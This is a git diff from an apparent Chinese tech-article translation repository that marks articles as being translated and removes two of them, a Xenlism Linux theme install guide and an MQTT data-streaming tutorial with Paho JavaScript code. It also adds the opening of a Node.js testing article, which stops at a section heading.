[2]:https://en.wikipedia.org/wiki/Desktop_environment
|
|
||||||
[3]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2013/03/check-ubuntu-version-command-line-1-800x216.jpeg
|
|
||||||
[4]:https://itsfoss.com/linux-code-names/
|
|
||||||
[5]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2013/03/check-ubuntu-version-command-line-2-800x185.jpeg
|
|
||||||
[6]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2013/03/ubuntu-version-system-settings.jpeg
|
|
||||||
[7]:https://www.gnome.org/
|
|
||||||
[8]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2013/03/checking-ubuntu-version-gui.jpeg
|
|
||||||
[9]:https://itsfoss.com/display-linux-logo-in-ascii/
|
|
||||||
[10]:https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2013/03/ubuntu-system-information-terminal-800x400.jpeg
|
|
@ -1,3 +1,4 @@
|
|||||||
|
Translating by qhwdw
|
||||||
Splicing the Cloud Native Stack, One Floor at a Time
|
Splicing the Cloud Native Stack, One Floor at a Time
|
||||||
======
|
======
|
||||||
At Packet, our value (automated infrastructure) is super fundamental. As such, we spend an enormous amount of time looking up at the players and trends in all the ecosystems above us - as well as the very few below!
|
At Packet, our value (automated infrastructure) is super fundamental. As such, we spend an enormous amount of time looking up at the players and trends in all the ecosystems above us - as well as the very few below!
|
||||||
|
@ -1,94 +0,0 @@
|
|||||||
translating---geekpi
|
|
||||||
|
|
||||||
Give Your Linux Desktop a Stunning Makeover With Xenlism Themes
|
|
||||||
============================================================
|
|
||||||
|
|
||||||
|
|
||||||
_Brief: Xenlism theme pack provides an aesthetically pleasing GTK theme, colorful icons, and minimalist wallpapers to transform your Linux desktop into an eye-catching setup._
|
|
||||||
|
|
||||||
It’s not every day that I dedicate an entire article to a theme unless I find something really awesome. I used to cover themes and icons regularly. But lately, I preferred having lists of [best GTK themes][6] and icon themes. This is more convenient for me and for you as well as you get to see many beautiful themes in one place.
|
|
||||||
|
|
||||||
After [Pop OS theme][7] suit, Xenlism is another theme that has left me awestruck by its look.
|
|
||||||
|
|
||||||
![Xenlism GTK theme for Ubuntu and Other Linux](https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2018/05/xenlishm-minimalism-gtk-theme-800x450.jpeg)
|
|
||||||
|
|
||||||
Xenlism GTK theme is based on the Arc theme, an inspiration behind so many themes these days. The GTK theme provides Windows buttons similar to macOS which I neither like nor dislike. The GTK theme has a flat, minimalist layout and I like that.
|
|
||||||
|
|
||||||
There are two icon themes in the Xenlism suite. Xenlism Wildfire is an old one and had already made to our list of [best icon themes][8].
|
|
||||||
|
|
||||||
![Beautiful Xenlism Wildfire theme for Ubuntu and Other Linux](https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2018/05/xenlism-wildfire-theme-800x450.jpeg)
|
|
||||||
Xenlism Wildfire Icons
|
|
||||||
|
|
||||||
Xenlsim Storm is the relatively new icon theme but is equally beautiful.
|
|
||||||
|
|
||||||
![Beautiful Xenlism Storm theme for Ubuntu and Other Linux](https://4bds6hergc-flywheel.netdna-ssl.com/wp-content/uploads/2018/05/xenlism-storm-theme-1-800x450.jpeg)
|
|
||||||
Xenlism Storm Icons
|
|
||||||
|
|
||||||
Xenlism themes are open source under GPL license.
|
|
||||||
|
|
||||||
### How to install Xenlism theme pack on Ubuntu 18.04
|
|
||||||
|
|
||||||
Xenlism dev provides an easier way of installing the theme pack through a PPA. Though the PPA is available for Ubuntu 16.04, I found the GTK theme wasn’t working with Unity. It works fine with the GNOME desktop in Ubuntu 18.04.
|
|
||||||
|
|
||||||
Open a terminal (Ctrl+Alt+T) and use the following commands one by one:
|
|
||||||
|
|
||||||
```
|
|
||||||
sudo add-apt-repository ppa:xenatt/xenlism
|
|
||||||
sudo apt update
|
|
||||||
```
|
|
||||||
|
|
||||||
This PPA offers four packages:
|
|
||||||
|
|
||||||
* xenlism-finewalls: for a set of wallpapers that will be available directly in the wallpaper section of Ubuntu. One of the wallpapers has been used in the screenshot.
|
|
||||||
|
|
||||||
* xenlism-minimalism-theme: GTK theme
|
|
||||||
|
|
||||||
* xenlism-storm: an icon theme (see previous screenshots)
|
|
||||||
|
|
||||||
* xenlism-wildfire-icon-theme: another icon theme with several color variants (folder colors get changed in the variants)
|
|
||||||
|
|
||||||
You can decide on your own what theme component you want to install. Personally, I don’t see any harm in installing all the components.
|
|
||||||
|
|
||||||
```
|
|
||||||
sudo apt install xenlism-minimalism-theme xenlism-storm-icon-theme xenlism-wildfire-icon-theme xenlism-finewalls
|
|
||||||
```
|
|
||||||
|
|
||||||
You can use GNOME Tweaks for changing the theme and icons. If you are not familiar with the procedure already, I suggest reading this tutorial to learn [how to install themes in Ubuntu 18.04 GNOME][9].
|
|
||||||
|
|
||||||
### Getting Xenlism themes in other Linux distributions
|
|
||||||
|
|
||||||
You can install Xenlism themes on other Linux distributions as well. Installation instructions for various Linux distributions can be found on its website:
|
|
||||||
|
|
||||||
[Install Xenlism Themes][10]
|
|
||||||
|
|
||||||
### What do you think?
|
|
||||||
|
|
||||||
I know not everyone would agree with me but I loved this theme. I think you are going to see the glimpse of Xenlism theme in the screenshots in future tutorials on It’s FOSS.
|
|
||||||
|
|
||||||
Did you like Xenlism theme? If not, what theme do you like the most? Share your opinion in the comment section below.
|
|
||||||
|
|
||||||
#### 关于作者
|
|
||||||
|
|
||||||
I am a professional software developer, and founder of It's FOSS. I am an avid Linux lover and Open Source enthusiast. I use Ubuntu and believe in sharing knowledge. Apart from Linux, I love classic detective mysteries. I'm a huge fan of Agatha Christie's work.
|
|
||||||
|
|
||||||
--------------------------------------------------------------------------------
|
|
||||||
|
|
||||||
via: https://itsfoss.com/xenlism-theme/
|
|
||||||
|
|
||||||
作者:[Abhishek Prakash ][a]
|
|
||||||
译者:[译者ID](https://github.com/译者ID)
|
|
||||||
校对:[校对者ID](https://github.com/校对者ID)
|
|
||||||
|
|
||||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
|
||||||
|
|
||||||
[a]:https://itsfoss.com/author/abhishek/
|
|
||||||
[1]:https://itsfoss.com/author/abhishek/
|
|
||||||
[2]:https://itsfoss.com/xenlism-theme/#comments
|
|
||||||
[3]:https://itsfoss.com/category/desktop/
|
|
||||||
[4]:https://itsfoss.com/tag/themes/
|
|
||||||
[5]:https://itsfoss.com/tag/xenlism/
|
|
||||||
[6]:https://itsfoss.com/best-gtk-themes/
|
|
||||||
[7]:https://itsfoss.com/pop-icon-gtk-theme-ubuntu/
|
|
||||||
[8]:https://itsfoss.com/best-icon-themes-ubuntu-16-04/
|
|
||||||
[9]:https://itsfoss.com/install-themes-ubuntu/
|
|
||||||
[10]:http://xenlism.github.io/minimalism/#install
|
|
@ -1,3 +1,5 @@
|
|||||||
|
pinewall translating
|
||||||
|
|
||||||
How Graphics Cards Work
|
How Graphics Cards Work
|
||||||
======
|
======
|
||||||
![AMD-Polaris][1]
|
![AMD-Polaris][1]
|
||||||
|
@ -1,3 +1,5 @@
|
|||||||
|
translating---geekpi
|
||||||
|
|
||||||
GitLab’s Ultimate & Gold Plans Are Now Free For Open-Source Projects
|
GitLab’s Ultimate & Gold Plans Are Now Free For Open-Source Projects
|
||||||
======
|
======
|
||||||
A lot has happened in the open-source community recently. First, [Microsoft acquired GitHub][1] and then people started to look for [GitHub alternatives][2] without even taking a second to think about it while Linus Torvalds released the [Linux Kernel 4.17][3]. Well, if you’ve been following us, I assume that you know all that.
|
A lot has happened in the open-source community recently. First, [Microsoft acquired GitHub][1] and then people started to look for [GitHub alternatives][2] without even taking a second to think about it while Linus Torvalds released the [Linux Kernel 4.17][3]. Well, if you’ve been following us, I assume that you know all that.
|
||||||
|
@ -1,311 +0,0 @@
|
|||||||
pinewall translating
|
|
||||||
|
|
||||||
Using MQTT to send and receive data for your next project
|
|
||||||
======
|
|
||||||
|
|
||||||
![](https://opensource.com/sites/default/files/styles/image-full-size/public/lead-images/toolbox-learn-draw-container-yearbook.png?itok=xDbwz1pP)
|
|
||||||
|
|
||||||
Last November we bought an electric car, and it raised an interesting question: When should we charge it? I was concerned about having the lowest emissions for the electricity used to charge the car, so this is a specific question: What is the rate of CO2 emissions per kWh at any given time, and when during the day is it at its lowest?
|
|
||||||
|
|
||||||
### Finding the data
|
|
||||||
|
|
||||||
I live in New York State. About 80% of our electricity comes from in-state generation, mostly through natural gas, hydro dams (much of it from Niagara Falls), nuclear, and a bit of wind, solar, and other fossil fuels. The entire system is managed by the [New York Independent System Operator][1] (NYISO), a not-for-profit entity that was set up to balance the needs of power generators, consumers, and regulatory bodies to keep the lights on in New York.
|
|
||||||
|
|
||||||
Although there is no official public API, as part of its mission, NYISO makes [a lot of open data][2] available for public consumption. This includes reporting on what fuels are being consumed to generate power, at five-minute intervals, throughout the state. These are published as CSV files on a public archive and updated throughout the day. If you know the number of megawatts coming from different kinds of fuels, you can make a reasonable approximation of how much CO2 is being emitted at any given time.
|
|
||||||
|
|
||||||
We should always be kind when building tools to collect and process open data to avoid overloading those systems. Instead of sending everyone to their archive service to download the files all the time, we can do better. We can create a low-overhead event stream that people can subscribe to and get updates as they happen. We can do that with [MQTT][3]. The target for my project ([ny-power.org][4]) was inclusion in the [Home Assistant][5] project, an open source home automation platform that has hundreds of thousands of users. If all of these users were hitting this CSV server all the time, NYISO might need to restrict access to it.
|
|
||||||
|
|
||||||
### What is MQTT?
|
|
||||||
|
|
||||||
MQTT is a publish/subscribe (pubsub) wire protocol designed with small devices in mind. Pubsub systems work like a message bus. You send a message to a topic, and any software with a subscription for that topic gets a copy of your message. As a sender, you never really know who is listening; you just provide your information to a set of topics and listen for any other topics you might care about. It's like walking into a party and listening for interesting conversations to join.
|
|
||||||
|
|
||||||
This can make for extremely efficient applications. Clients subscribe to a narrow selection of topics and only receive the information they are looking for. This saves both processing time and network bandwidth.
|
|
||||||
|
|
||||||
As an open standard, MQTT has many open source implementations of both clients and servers. There are client libraries for every language you could imagine, even a library you can embed in Arduino for making sensor networks. There are many servers to choose from. My go-to is the [Mosquitto][6] server from Eclipse, as it's small, written in C, and can handle tens of thousands of subscribers without breaking a sweat.
|
|
||||||
|
|
||||||
### Why I like MQTT
|
|
||||||
|
|
||||||
Over the past two decades, we've come up with tried and true models for software applications to ask questions of services. Do I have more email? What is the current weather? Should I buy this thing now? This pattern of "ask/receive" works well much of the time; however, in a world awash with data, there are other patterns we need. The MQTT pubsub model is powerful where lots of data is published inbound to the system. Clients can subscribe to narrow slices of data and receive updates instantly when that data comes in.
|
|
||||||
|
|
||||||
MQTT also has additional interesting features, such as "last-will-and-testament" messages, which make it possible to distinguish between silence because there is no relevant data and silence because your data collectors have crashed. MQTT also has retained messages, which provide the last message on a topic to clients when they first connect. This is extremely useful for topics that update slowly.
|
|
||||||
|
|
||||||
In my work with the Home Assistant project, I've found this message bus model works extremely well for heterogeneous systems. If you dive into the Internet of Things space, you'll quickly run into MQTT everywhere.
|
|
||||||
|
|
||||||
### Our first MQTT stream
|
|
||||||
|
|
||||||
One of NYSO's CSV files is the real-time fuel mix. Every five minutes, it's updated with the fuel sources and power generated (in megawatts) during that time period.
|
|
||||||
|
|
||||||
The CSV file looks something like this:
|
|
||||||
|
|
||||||
| Time Stamp | Time Zone | Fuel Category | Gen MW |
|
|
||||||
| 05/09/2018 00:05:00 | EDT | Dual Fuel | 1400 |
|
|
||||||
| 05/09/2018 00:05:00 | EDT | Natural Gas | 2144 |
|
|
||||||
| 05/09/2018 00:05:00 | EDT | Nuclear | 4114 |
|
|
||||||
| 05/09/2018 00:05:00 | EDT | Other Fossil Fuels | 4 |
|
|
||||||
| 05/09/2018 00:05:00 | EDT | Other Renewables | 226 |
|
|
||||||
| 05/09/2018 00:05:00 | EDT | Wind | 1 |
|
|
||||||
| 05/09/2018 00:05:00 | EDT | Hydro | 3229 |
|
|
||||||
| 05/09/2018 00:10:00 | EDT | Dual Fuel | 1307 |
|
|
||||||
| 05/09/2018 00:10:00 | EDT | Natural Gas | 2092 |
|
|
||||||
| 05/09/2018 00:10:00 | EDT | Nuclear | 4115 |
|
|
||||||
| 05/09/2018 00:10:00 | EDT | Other Fossil Fuels | 4 |
|
|
||||||
| 05/09/2018 00:10:00 | EDT | Other Renewables | 224 |
|
|
||||||
| 05/09/2018 00:10:00 | EDT | Wind | 40 |
|
|
||||||
| 05/09/2018 00:10:00 | EDT | Hydro | 3166 |
|
|
||||||
|
|
||||||
The only odd thing in the table is the dual-fuel category. Most natural gas plants in New York can also burn other fossil fuel to generate power. During cold snaps in the winter, the natural gas supply gets constrained, and its use for home heating is prioritized over power generation. This happens at a low enough frequency that we can consider dual fuel to be natural gas (for our calculations).
|
|
||||||
|
|
||||||
The file is updated throughout the day. I created a simple data pump that polls for the file every minute and looks for updates. It publishes any new entries out to the MQTT server into a set of topics that largely mirror this CSV file. The payload is turned into a JSON object that is easy to parse from nearly any programming language.
|
|
||||||
```
|
|
||||||
ny-power/upstream/fuel-mix/Hydro {"units": "MW", "value": 3229, "ts": "05/09/2018 00:05:00"}
|
|
||||||
|
|
||||||
ny-power/upstream/fuel-mix/Dual Fuel {"units": "MW", "value": 1400, "ts": "05/09/2018 00:05:00"}
|
|
||||||
|
|
||||||
ny-power/upstream/fuel-mix/Natural Gas {"units": "MW", "value": 2144, "ts": "05/09/2018 00:05:00"}
|
|
||||||
|
|
||||||
ny-power/upstream/fuel-mix/Other Fossil Fuels {"units": "MW", "value": 4, "ts": "05/09/2018 00:05:00"}
|
|
||||||
|
|
||||||
ny-power/upstream/fuel-mix/Wind {"units": "MW", "value": 41, "ts": "05/09/2018 00:05:00"}
|
|
||||||
|
|
||||||
ny-power/upstream/fuel-mix/Other Renewables {"units": "MW", "value": 226, "ts": "05/09/2018 00:05:00"}
|
|
||||||
|
|
||||||
ny-power/upstream/fuel-mix/Nuclear {"units": "MW", "value": 4114, "ts": "05/09/2018 00:05:00"}
|
|
||||||
|
|
||||||
```
|
|
||||||
|
|
||||||
This direct reflection is a good first step in turning open data into open events. We'll be converting this into a CO2 intensity, but other applications might want these raw feeds to do other calculations with them.
|
|
||||||
|
|
||||||
### MQTT topics
|
|
||||||
|
|
||||||
Topics and topic structures are one of MQTT's major design points. Unlike more "enterprisey" message buses, in MQTT topics are not preregistered. A sender can create topics on the fly, the only limit being that they are less than 220 characters. The `/` character is special; it's used to create topic hierarchies. As we'll soon see, you can subscribe to slices of data in these hierarchies.
|
|
||||||
|
|
||||||
Out of the box with Mosquitto, every client can publish to any topic. While it's great for prototyping, before going to production you'll want to add an access control list (ACL) to restrict writing to authorized applications. For example, my app's tree is accessible to everyone in read-only format, but only clients with specific credentials can publish to it.
|
|
||||||
|
|
||||||
There is no automatic schema around topics nor a way to discover all the possible topics that clients will publish to. You'll have to encode that understanding directly into any application that consumes the MQTT bus.
|
|
||||||
|
|
||||||
So how should you design your topics? The best practice is to start with an application-specific root name, in our case, `ny-power`. After that, build a hierarchy as deep as you need for efficient subscription. The `upstream` tree will contain data that comes directly from an upstream source without any processing. Our `fuel-mix` category is a specific type of data. We may add others later.
|
|
||||||
|
|
||||||
### Subscribing to topics
|
|
||||||
|
|
||||||
Subscriptions in MQTT are simple string matches. For processing efficiency, only two wildcards are allowed:
|
|
||||||
|
|
||||||
* `#` matches everything recursively to the end
|
|
||||||
* `+` matches only until the next `/` character
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
It's easiest to explain this with some examples:
|
|
||||||
```
|
|
||||||
ny-power/# - match everything published by the ny-power app
|
|
||||||
|
|
||||||
ny-power/upstream/# - match all raw data
|
|
||||||
|
|
||||||
ny-power/upstream/fuel-mix/+ - match all fuel types
|
|
||||||
|
|
||||||
ny-power/+/+/Hydro - match everything about Hydro power that's
|
|
||||||
|
|
||||||
nested 2 deep (even if it's not in the upstream tree)
|
|
||||||
|
|
||||||
```
|
|
||||||
|
|
||||||
A wide subscription like `ny-power/#` is common for low-volume applications. Just get everything over the network and handle it in your own application. This works poorly for high-volume applications, as most of the network bandwidth will be wasted as you drop most of the messages on the floor.
|
|
||||||
|
|
||||||
To stay performant at higher volumes, applications will do some clever topic slides like `ny-power/+/+/Hydro` to get exactly the cross-section of data they need.
|
|
||||||
|
|
||||||
### Adding our next layer of data
|
|
||||||
|
|
||||||
From this point forward, everything in the application will work off existing MQTT streams. The first additional layer of data is computing the power's CO2 intensity.
|
|
||||||
|
|
||||||
Using the 2016 [U.S. Energy Information Administration][7] numbers for total emissions and total power by fuel type in New York, we can come up with an [average emissions rate][8] per megawatt hour of power.
|
|
||||||
|
|
||||||
This is encapsulated in a dedicated microservice. This has a subscription on `ny-power/upstream/fuel-mix/+`, which matches all upstream fuel-mix entries from the data pump. It then performs the calculation and publishes out to a new topic tree:
|
|
||||||
```
|
|
||||||
ny-power/computed/co2 {"units": "g / kWh", "value": 152.9486, "ts": "05/09/2018 00:05:00"}
|
|
||||||
|
|
||||||
```
|
|
||||||
|
|
||||||
In turn, there is another process that subscribes to this topic tree and archives that data into an [InfluxDB][9] instance. It then publishes a 24-hour time series to `ny-power/archive/co2/24h`, which makes it easy to graph the recent changes.
|
|
||||||
|
|
||||||
This layer model works well, as the logic for each of these programs can be distinct from each other. In a more complicated system, they may not even be in the same programming language. We don't care, because the interchange format is MQTT messages, with well-known topics and JSON payloads.
|
|
||||||
|
|
||||||
### Consuming from the command line
|
|
||||||
|
|
||||||
To get a feel for MQTT in action, it's useful to just attach it to a bus and see the messages flow. The `mosquitto_sub` program included in the `mosquitto-clients` package is a simple way to do that.
|
|
||||||
|
|
||||||
After you've installed it, you need to provide a server hostname and the topic you'd like to listen to. The `-v` flag is important if you want to see the topics being posted to. Without that, you'll see only the payloads.
|
|
||||||
```
|
|
||||||
mosquitto_sub -h mqtt.ny-power.org -t ny-power/# -v
|
|
||||||
|
|
||||||
```
|
|
||||||
|
|
||||||
Whenever I'm writing or debugging an MQTT application, I always have a terminal with `mosquitto_sub` running.
|
|
||||||
|
|
||||||
### Accessing MQTT directly from the web
|
|
||||||
|
|
||||||
We now have an application providing an open event stream. We can connect to it with our microservices and, with some command-line tooling, it's on the internet for all to see. But the web is still king, so it's important to get it directly into a user's browser.
|
|
||||||
|
|
||||||
The MQTT folks thought about this one. The protocol specification is designed to work over three transport protocols: [TCP][10], [UDP][11], and [WebSockets][12]. WebSockets are supported by all major browsers as a way to retain persistent connections for real-time applications.
|
|
||||||
|
|
||||||
The Eclipse project has a JavaScript implementation of MQTT called [Paho][13], which can be included in your application. The pattern is to connect to the host, set up some subscriptions, and then react to messages as they are received.
|
|
||||||
```
|
|
||||||
// ny-power web console application
|
|
||||||
|
|
||||||
var client = new Paho.MQTT.Client(mqttHost, Number("80"), "client-" + Math.random());
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
// set callback handlers
|
|
||||||
|
|
||||||
client.onMessageArrived = onMessageArrived;
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
// connect the client
|
|
||||||
|
|
||||||
client.reconnect = true;
|
|
||||||
|
|
||||||
client.connect({onSuccess: onConnect});
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
// called when the client connects
|
|
||||||
|
|
||||||
function onConnect() {
|
|
||||||
|
|
||||||
// Once a connection has been made, make a subscription and send a message.
|
|
||||||
|
|
||||||
console.log("onConnect");
|
|
||||||
|
|
||||||
client.subscribe("ny-power/computed/co2");
|
|
||||||
|
|
||||||
client.subscribe("ny-power/archive/co2/24h");
|
|
||||||
|
|
||||||
client.subscribe("ny-power/upstream/fuel-mix/#");
|
|
||||||
|
|
||||||
}
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
// called when a message arrives
|
|
||||||
|
|
||||||
function onMessageArrived(message) {
|
|
||||||
|
|
||||||
console.log("onMessageArrived:"+message.destinationName + message.payloadString);
|
|
||||||
|
|
||||||
if (message.destinationName == "ny-power/computed/co2") {
|
|
||||||
|
|
||||||
var data = JSON.parse(message.payloadString);
|
|
||||||
|
|
||||||
$("#co2-per-kwh").html(Math.round(data.value));
|
|
||||||
|
|
||||||
$("#co2-units").html(data.units);
|
|
||||||
|
|
||||||
$("#co2-updated").html(data.ts);
|
|
||||||
|
|
||||||
}
|
|
||||||
|
|
||||||
if (message.destinationName.startsWith("ny-power/upstream/fuel-mix")) {
|
|
||||||
|
|
||||||
fuel_mix_graph(message);
|
|
||||||
|
|
||||||
}
|
|
||||||
|
|
||||||
if (message.destinationName == "ny-power/archive/co2/24h") {
|
|
||||||
|
|
||||||
var data = JSON.parse(message.payloadString);
|
|
||||||
|
|
||||||
var plot = [
|
|
||||||
|
|
||||||
{
|
|
||||||
|
|
||||||
x: data.ts,
|
|
||||||
|
|
||||||
y: data.values,
|
|
||||||
|
|
||||||
type: 'scatter'
|
|
||||||
|
|
||||||
}
|
|
||||||
|
|
||||||
];
|
|
||||||
|
|
||||||
var layout = {
|
|
||||||
|
|
||||||
yaxis: {
|
|
||||||
|
|
||||||
title: "g CO2 / kWh",
|
|
||||||
|
|
||||||
}
|
|
||||||
|
|
||||||
};
|
|
||||||
|
|
||||||
Plotly.newPlot('co2_graph', plot, layout);
|
|
||||||
|
|
||||||
}
|
|
||||||
|
|
||||||
```
|
|
||||||
|
|
||||||
This application subscribes to a number of topics because we're going to display a few different kinds of data. The `ny-power/computed/co2` topic provides us a topline number of current intensity. Whenever we receive that topic, we replace the related contents on the site.
|
|
||||||
|
|
||||||
|
|
||||||
![NY ISO Grid CO2 Intensity][15]
|
|
||||||
|
|
||||||
NY ISO Grid CO2 Intensity graph from [ny-power.org][4].
|
|
||||||
|
|
||||||
The `ny-power/archive/co2/24h` topic provides a time series that can be loaded into a [Plotly][16] line graph. And `ny-power/upstream/fuel-mix` provides the data needed to provide a nice bar graph of the current fuel mix.
|
|
||||||
|
|
||||||
|
|
||||||
![Fuel mix on NYISO grid][18]
|
|
||||||
|
|
||||||
Fuel mix on NYISO grid, [ny-power.org][4].
|
|
||||||
|
|
||||||
This is a dynamic website that is not polling the server. It is attached to the MQTT bus and listening on its open WebSocket. The webpage is a pub/sub client just like the data pump and the archiver. This one just happens to be executing in your browser instead of a microservice in the cloud.
|
|
||||||
|
|
||||||
You can see the page in action at <http://ny-power.org>. That includes both the graphics and a real-time MQTT console to see the messages as they come in.
|
|
||||||
|
|
||||||
### Diving deeper
|
|
||||||
|
|
||||||
The entire ny-power.org application is [available as open source on GitHub][19]. You can also check out [this architecture overview][20] to see how it was built as a set of Kubernetes microservices deployed with [Helm][21]. You can see another interesting MQTT application example with [this code pattern][22] using MQTT and OpenWhisk to translate text messages in real time.
|
|
||||||
|
|
||||||
MQTT is used extensively in the Internet of Things space, and many more examples of MQTT use can be found at the [Home Assistant][23] project.
|
|
||||||
|
|
||||||
And if you want to dive deep into the protocol, [mqtt.org][3] has all the details for this open standard.
|
|
||||||
|
|
||||||
To learn more, attend Sean Dague's talk, [Adding MQTT to your toolkit][24], at [OSCON][25], which will be held July 16-19 in Portland, Oregon.
|
|
||||||
|
|
||||||
--------------------------------------------------------------------------------
|
|
||||||
|
|
||||||
via: https://opensource.com/article/18/6/mqtt
|
|
||||||
|
|
||||||
作者:[Sean Dague][a]
|
|
||||||
选题:[lujun9972](https://github.com/lujun9972)
|
|
||||||
译者:[译者ID](https://github.com/译者ID)
|
|
||||||
校对:[校对者ID](https://github.com/校对者ID)
|
|
||||||
|
|
||||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
|
||||||
|
|
||||||
[a]:https://opensource.com/users/sdague
|
|
||||||
[1]:http://www.nyiso.com/public/index.jsp
|
|
||||||
[2]:http://www.nyiso.com/public/markets_operations/market_data/reports_info/index.jsp
|
|
||||||
[3]:http://mqtt.org/
|
|
||||||
[4]:http://ny-power.org/#
|
|
||||||
[5]:https://www.home-assistant.io
|
|
||||||
[6]:https://mosquitto.org/
|
|
||||||
[7]:https://www.eia.gov/
|
|
||||||
[8]:https://github.com/IBM/ny-power/blob/master/src/nypower/calc.py#L1-L60
|
|
||||||
[9]:https://www.influxdata.com/
|
|
||||||
[10]:https://en.wikipedia.org/wiki/Transmission_Control_Protocol
|
|
||||||
[11]:https://en.wikipedia.org/wiki/User_Datagram_Protocol
|
|
||||||
[12]:https://en.wikipedia.org/wiki/WebSocket
|
|
||||||
[13]:https://www.eclipse.org/paho/
|
|
||||||
[14]:/file/400041
|
|
||||||
[15]:https://opensource.com/sites/default/files/uploads/mqtt_nyiso-co2intensity.png (NY ISO Grid CO2 Intensity)
|
|
||||||
[16]:https://plot.ly/
|
|
||||||
[17]:/file/400046
|
|
||||||
[18]:https://opensource.com/sites/default/files/uploads/mqtt_nyiso_fuel-mix.png (Fuel mix on NYISO grid)
|
|
||||||
[19]:https://github.com/IBM/ny-power
|
|
||||||
[20]:https://developer.ibm.com/code/patterns/use-mqtt-stream-real-time-data/
|
|
||||||
[21]:https://helm.sh/
|
|
||||||
[22]:https://developer.ibm.com/code/patterns/deploy-serverless-multilingual-conference-room/
|
|
||||||
[23]:https://www.home-assistant.io/
|
|
||||||
[24]:https://conferences.oreilly.com/oscon/oscon-or/public/schedule/speaker/77317
|
|
||||||
[25]:https://conferences.oreilly.com/oscon/oscon-or
|
|
@ -1,3 +1,4 @@
|
|||||||
|
Translating by qhwdw
|
||||||
How to reset, revert, and return to previous states in Git
|
How to reset, revert, and return to previous states in Git
|
||||||
======
|
======
|
||||||
|
|
||||||
|
@ -1,3 +1,4 @@
|
|||||||
|
Translating by qhwdw
|
||||||
Bitcoin is a Cult — Adam Caudill
|
Bitcoin is a Cult — Adam Caudill
|
||||||
======
|
======
|
||||||
The Bitcoin community has changed greatly over the years; from technophiles that could explain a [Merkle tree][1] in their sleep, to speculators driven by the desire for a quick profit & blockchain startups seeking billion dollar valuations led by people who don’t even know what a Merkle tree is. As the years have gone on, a zealotry has been building around Bitcoin and other cryptocurrencies driven by people who see them as something far grander than they actually are; people who believe that normal (or fiat) currencies are becoming a thing of the past, and the cryptocurrencies will fundamentally change the world’s economy.
|
The Bitcoin community has changed greatly over the years; from technophiles that could explain a [Merkle tree][1] in their sleep, to speculators driven by the desire for a quick profit & blockchain startups seeking billion dollar valuations led by people who don’t even know what a Merkle tree is. As the years have gone on, a zealotry has been building around Bitcoin and other cryptocurrencies driven by people who see them as something far grander than they actually are; people who believe that normal (or fiat) currencies are becoming a thing of the past, and the cryptocurrencies will fundamentally change the world’s economy.
|
||||||
|
322
sources/tech/20180705 Testing Node.js in 2018.md
Normal file
322
sources/tech/20180705 Testing Node.js in 2018.md
Normal file
@ -0,0 +1,322 @@
|
|||||||
|
BriFuture is translating
|
||||||
|
|
||||||
|
|
||||||
|
Testing Node.js in 2018
|
||||||
|
============================================================
|
||||||
|
|
||||||
|
![](https://cdn-images-1.medium.com/max/1600/1*J3lGUOAGK-XdZMXwiHcI6w.png)
|
||||||
|
|
||||||
|
[Stream][4] powers feeds for over 300+ million end users. With all of those users relying on our infrastructure, we’re very good about testing everything that gets pushed into production. Our primary codebase is written in Go, with some remaining bits of Python.
|
||||||
|
|
||||||
|
Our recent showcase application, [Winds 2.0][5], is built with Node.js and we quickly learned that our usual testing methods in Go and Python didn’t quite fit. Furthermore, creating a proper test suite requires a bit of upfront work in Node.js as the frameworks we are using don’t offer any type of built-in test functionality.
|
||||||
|
|
||||||
|
Setting up a good test framework can be tricky regardless of what language you’re using. In this post, we’ll uncover the hard parts of testing with Node.js, the various tooling we decided to utilize in Winds 2.0, and point you in the right direction for when it comes time for you to write your next set of tests.
|
||||||
|
|
||||||
|
### Why Testing is so Important
|
||||||
|
|
||||||
|
We’ve all pushed a bad commit to production and faced the consequences. It’s not a fun thing to have happen. Writing a solid test suite is not only a good sanity check, but it allows you to completely refactor code and feel confident that your codebase is still functional. This is especially important if you’ve just launched.
|
||||||
|
|
||||||
|
If you’re working with a team, it’s extremely important that you have test coverage. Without it, it’s nearly impossible for other developers on the team to know if their contributions will result in a breaking change (ouch).
|
||||||
|
|
||||||
|
Writing tests also encourage you and your teammates to split up code into smaller pieces. This makes it much easier to understand your code, and fix bugs along the way. The productivity gains are even bigger, due to the fact that you catch bugs early on.
|
||||||
|
|
||||||
|
Finally, without tests, your codebase might as well be a house of cards. There is simply zero certainty that your code is stable.
|
||||||
|
|
||||||
|
### The Hard Parts
|
||||||
|
|
||||||
|
In my opinion, most of the testing problems we ran into with Winds were specific to Node.js. The ecosystem is always growing. For example, if you are on macOS and run “brew upgrade” (with homebrew installed), your chances of seeing a new version of Node.js are quite high. With Node.js moving quickly and libraries following close behind, keeping up to date with the latest libraries is difficult.
|
||||||
|
|
||||||
|
Below are a few pain points that immediately come to mind:
|
||||||
|
|
||||||
|
1. Testing in Node.js is very opinionated and un-opinionated at the same time. Many people have different views on how a test infrastructure should be built and measured for success. The sad part is that there is no golden standard (yet) for how you should approach testing.
|
||||||
|
|
||||||
|
2. There are a large number of frameworks available to use in your application. However, they are generally minimal with no well-defined configuration or boot process. This leads to side effects that are very common, and yet hard to diagnose; so, you’ll likely end up writing your own test runner from scratch.
|
||||||
|
|
||||||
|
3. It’s almost guaranteed that you will be _required_ to write your own test runner (we’ll get to this in a minute).
|
||||||
|
|
||||||
|
The situations listed above are not ideal and it’s something that the Node.js community needs to address sooner rather than later. If other languages have figured it out, I think it’s time for Node.js, a widely adopted language, to figure it out as well.
|
||||||
|
|
||||||
|
### Writing Your Own Test Runner
|
||||||
|
|
||||||
|
